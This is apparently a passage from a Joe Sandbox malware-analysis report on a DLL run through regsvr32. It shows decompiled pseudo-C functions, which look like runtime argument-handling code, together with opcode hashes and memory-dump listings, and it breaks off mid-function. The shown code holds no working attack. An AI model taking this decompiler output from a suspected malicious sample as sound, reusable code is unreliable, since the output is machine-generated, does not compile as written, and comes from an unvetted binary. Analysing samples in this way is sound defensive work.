                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction ID: c998a4d3f998f528dc77ce8d8d031108815a0e2f12346c060726950057862b36
                                                                      • Opcode Fuzzy Hash: b2bdea0d8b75edc58de98e46d3c35c1e5101474f32e2e361ab5f51a180285eea
                                                                      • Instruction Fuzzy Hash: 7B31A472604B88C5EB618F29E0907AD77A0F38DF88F248125DB4D0B751DF36C556DB05
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E000000011800227D0(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800227fc;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((char*)(_t67 - 8));
                                                                      				goto 0x800228cc;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8002283d;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((char*)(_t67 - 8)));
                                                                      				goto 0x800228ce;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x800228bd;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80022879;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x800228ce;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180017AF4(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80022871;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((char*)(_t67 - 8)));
                                                                      				goto 0x80022874;
                                                                      				 *_t71 =  *((char*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x1800227d0
                                                                      0x1800227e1
                                                                      0x1800227e4
                                                                      0x1800227e6
                                                                      0x1800227eb
                                                                      0x1800227f4
                                                                      0x1800227f7
                                                                      0x180022806
                                                                      0x180022808
                                                                      0x18002280e
                                                                      0x180022811
                                                                      0x180022816
                                                                      0x18002281a
                                                                      0x180022821
                                                                      0x180022827
                                                                      0x18002282c
                                                                      0x180022831
                                                                      0x180022838
                                                                      0x180022848
                                                                      0x18002284a
                                                                      0x180022854
                                                                      0x180022859
                                                                      0x180022861
                                                                      0x180022863
                                                                      0x180022869
                                                                      0x18002286e
                                                                      0x180022871
                                                                      0x180022877
                                                                      0x180022879
                                                                      0x18002287d
                                                                      0x180022883
                                                                      0x18002288d
                                                                      0x18002288f
                                                                      0x180022893
                                                                      0x180022896
                                                                      0x18002289d
                                                                      0x1800228a1
                                                                      0x1800228a8
                                                                      0x1800228ac
                                                                      0x1800228b1
                                                                      0x1800228b6
                                                                      0x1800228bb
                                                                      0x1800228c9
                                                                      0x1800228d8

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b734e8f98e19823a7bdd0dff92a36d8ed504ddefe46cd45696470e826eb3ee24
                                                                      • Instruction ID: 7975889769f112660600f7d5cb85176b5d6a6cdd45af2f09147782104f9def5e
                                                                      • Opcode Fuzzy Hash: b734e8f98e19823a7bdd0dff92a36d8ed504ddefe46cd45696470e826eb3ee24
                                                                      • Instruction Fuzzy Hash: 6F319173605A8486EB668F69E0403AD77A0F38DB8CF248125EB9C4B761DF36C596C714
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E000000011800228DC(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80022908;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x000000ff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x800229d7;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80022949;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x800229d9;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x800229c9;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80022985;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x800229d9;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180017AF4(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x8002297d;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x80022980;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x1800228dc
                                                                      0x1800228dc
                                                                      0x1800228ed
                                                                      0x1800228f0
                                                                      0x1800228f2
                                                                      0x1800228f7
                                                                      0x1800228fb
                                                                      0x180022900
                                                                      0x180022903
                                                                      0x180022912
                                                                      0x180022914
                                                                      0x18002291a
                                                                      0x18002291d
                                                                      0x180022922
                                                                      0x180022926
                                                                      0x18002292d
                                                                      0x180022933
                                                                      0x180022938
                                                                      0x18002293d
                                                                      0x180022944
                                                                      0x180022954
                                                                      0x180022956
                                                                      0x180022960
                                                                      0x180022965
                                                                      0x18002296d
                                                                      0x18002296f
                                                                      0x180022975
                                                                      0x18002297a
                                                                      0x18002297d
                                                                      0x180022983
                                                                      0x180022985
                                                                      0x180022989
                                                                      0x180022999
                                                                      0x18002299b
                                                                      0x18002299f
                                                                      0x1800229a2
                                                                      0x1800229a9
                                                                      0x1800229ad
                                                                      0x1800229b4
                                                                      0x1800229b8
                                                                      0x1800229bd
                                                                      0x1800229c2
                                                                      0x1800229c7
                                                                      0x1800229d4
                                                                      0x1800229e3

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5175b3594264874c1733d4ecbe8e2630a14b4e8ea17cd0b9bcf2e7f8e098195
                                                                      • Instruction ID: 19504ad3828605199afd33c21d0fae50ed8f8ab8128b0380f00a14f85c057f73
                                                                      • Opcode Fuzzy Hash: e5175b3594264874c1733d4ecbe8e2630a14b4e8ea17cd0b9bcf2e7f8e098195
                                                                      • Instruction Fuzzy Hash: 1B31B673214648C6EBA28F29E0403AD77A0F38DB8CF258115EB9D4B751CF36C596DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180024934(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80024960;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((char*)(_t67 - 8));
                                                                      				goto 0x80024a30;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800249a1;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((char*)(_t67 - 8)));
                                                                      				goto 0x80024a32;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80024a21;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x800249dd;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80024a32;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180010A8C(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x800249d5;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((char*)(_t67 - 8)));
                                                                      				goto 0x800249d8;
                                                                      				 *_t71 =  *((char*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180024934
                                                                      0x180024945
                                                                      0x180024948
                                                                      0x18002494a
                                                                      0x18002494f
                                                                      0x180024958
                                                                      0x18002495b
                                                                      0x18002496a
                                                                      0x18002496c
                                                                      0x180024972
                                                                      0x180024975
                                                                      0x18002497a
                                                                      0x18002497e
                                                                      0x180024985
                                                                      0x18002498b
                                                                      0x180024990
                                                                      0x180024995
                                                                      0x18002499c
                                                                      0x1800249ac
                                                                      0x1800249ae
                                                                      0x1800249b8
                                                                      0x1800249bd
                                                                      0x1800249c5
                                                                      0x1800249c7
                                                                      0x1800249cd
                                                                      0x1800249d2
                                                                      0x1800249d5
                                                                      0x1800249db
                                                                      0x1800249dd
                                                                      0x1800249e1
                                                                      0x1800249e7
                                                                      0x1800249f1
                                                                      0x1800249f3
                                                                      0x1800249f7
                                                                      0x1800249fa
                                                                      0x180024a01
                                                                      0x180024a05
                                                                      0x180024a0c
                                                                      0x180024a10
                                                                      0x180024a15
                                                                      0x180024a1a
                                                                      0x180024a1f
                                                                      0x180024a2d
                                                                      0x180024a3c

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b734e8f98e19823a7bdd0dff92a36d8ed504ddefe46cd45696470e826eb3ee24
                                                                      • Instruction ID: 2c551fc56d04beb11f66b9c2003092b449d85fb30664d45c42dc300bfff33d53
                                                                      • Opcode Fuzzy Hash: b734e8f98e19823a7bdd0dff92a36d8ed504ddefe46cd45696470e826eb3ee24
                                                                      • Instruction Fuzzy Hash: 53319173214A88C6EB628F29E0403AD7BA0F389B8CF658125DB8D0B751DF36C596CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E000000011800229E4(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80022a10;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((short*)(_t67 - 8));
                                                                      				goto 0x80022ae0;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80022a51;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((short*)(_t67 - 8)));
                                                                      				goto 0x80022ae2;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80022ad1;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80022a8d;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80022ae2;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180017AF4(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80022a85;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((short*)(_t67 - 8)));
                                                                      				goto 0x80022a88;
                                                                      				 *_t71 =  *((short*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x1800229e4
                                                                      0x1800229f5
                                                                      0x1800229f8
                                                                      0x1800229fa
                                                                      0x1800229ff
                                                                      0x180022a08
                                                                      0x180022a0b
                                                                      0x180022a1a
                                                                      0x180022a1c
                                                                      0x180022a22
                                                                      0x180022a25
                                                                      0x180022a2a
                                                                      0x180022a2e
                                                                      0x180022a35
                                                                      0x180022a3b
                                                                      0x180022a40
                                                                      0x180022a45
                                                                      0x180022a4c
                                                                      0x180022a5c
                                                                      0x180022a5e
                                                                      0x180022a68
                                                                      0x180022a6d
                                                                      0x180022a75
                                                                      0x180022a77
                                                                      0x180022a7d
                                                                      0x180022a82
                                                                      0x180022a85
                                                                      0x180022a8b
                                                                      0x180022a8d
                                                                      0x180022a91
                                                                      0x180022a97
                                                                      0x180022aa1
                                                                      0x180022aa3
                                                                      0x180022aa7
                                                                      0x180022aaa
                                                                      0x180022ab1
                                                                      0x180022ab5
                                                                      0x180022abc
                                                                      0x180022ac0
                                                                      0x180022ac5
                                                                      0x180022aca
                                                                      0x180022acf
                                                                      0x180022add
                                                                      0x180022aec

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3bd6936c4cedb9bebc595eac953f31225e415109cae37dbe40899e651ae10d30
                                                                      • Instruction ID: 7e2d641bf5b8ade42e9f6eafcd28d5964ad1a7287c9d1d2f8ac99d3b7c244ea1
                                                                      • Opcode Fuzzy Hash: 3bd6936c4cedb9bebc595eac953f31225e415109cae37dbe40899e651ae10d30
                                                                      • Instruction Fuzzy Hash: A131A072204A48C6EBA28F29E4403AD77A0F39CB8CF658125EB9D0BB51DF36C596C705
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E0000000118001E9F0(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t78;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001ea1d;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x0000ffff;
                                                                      				 *__rdx = r8w;
                                                                      				goto 0x8001eaec;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001ea5e;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t58, __rcx, _t67, __rdx, _t73, _t74, _t78);
                                                                      				goto 0x8001eaee;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x8001eade;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x8001ea9a;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001eaee;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180017AF4(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x8001ea92;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t62, _t64, _t68, _t71, _t73, _t74, _t78);
                                                                      				goto 0x8001ea95;
                                                                      				 *_t71 =  *( *(_t68 + 0x488 + _t62 * 8)) & 0x0000ffff;
                                                                      				return 1;
                                                                      			}



















                                                                      0x18001e9f0
                                                                      0x18001ea01
                                                                      0x18001ea04
                                                                      0x18001ea06
                                                                      0x18001ea0b
                                                                      0x18001ea0f
                                                                      0x18001ea14
                                                                      0x18001ea18
                                                                      0x18001ea27
                                                                      0x18001ea29
                                                                      0x18001ea2f
                                                                      0x18001ea32
                                                                      0x18001ea37
                                                                      0x18001ea3b
                                                                      0x18001ea42
                                                                      0x18001ea48
                                                                      0x18001ea4d
                                                                      0x18001ea52
                                                                      0x18001ea59
                                                                      0x18001ea69
                                                                      0x18001ea6b
                                                                      0x18001ea75
                                                                      0x18001ea7a
                                                                      0x18001ea82
                                                                      0x18001ea84
                                                                      0x18001ea8a
                                                                      0x18001ea8f
                                                                      0x18001ea92
                                                                      0x18001ea98
                                                                      0x18001ea9a
                                                                      0x18001ea9e
                                                                      0x18001eaa4
                                                                      0x18001eaae
                                                                      0x18001eab0
                                                                      0x18001eab4
                                                                      0x18001eab7
                                                                      0x18001eabe
                                                                      0x18001eac2
                                                                      0x18001eac9
                                                                      0x18001eacd
                                                                      0x18001ead2
                                                                      0x18001ead7
                                                                      0x18001eadc
                                                                      0x18001eae9
                                                                      0x18001eaf8

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f6c2885d073b13966d6eef6bceaac8cb61cd051f5a9b02440e1ad5de2c4d5924
                                                                      • Instruction ID: 6f278f1474593556be616c7c5b811413087b0dbeb26c6bbadf0664d75bdf747a
                                                                      • Opcode Fuzzy Hash: f6c2885d073b13966d6eef6bceaac8cb61cd051f5a9b02440e1ad5de2c4d5924
                                                                      • Instruction Fuzzy Hash: 0131C272214A88C6EBA18F29D0403AD77A0F78DB8CF64C116EB8C4B751DF36C596CB05
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180024A40(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
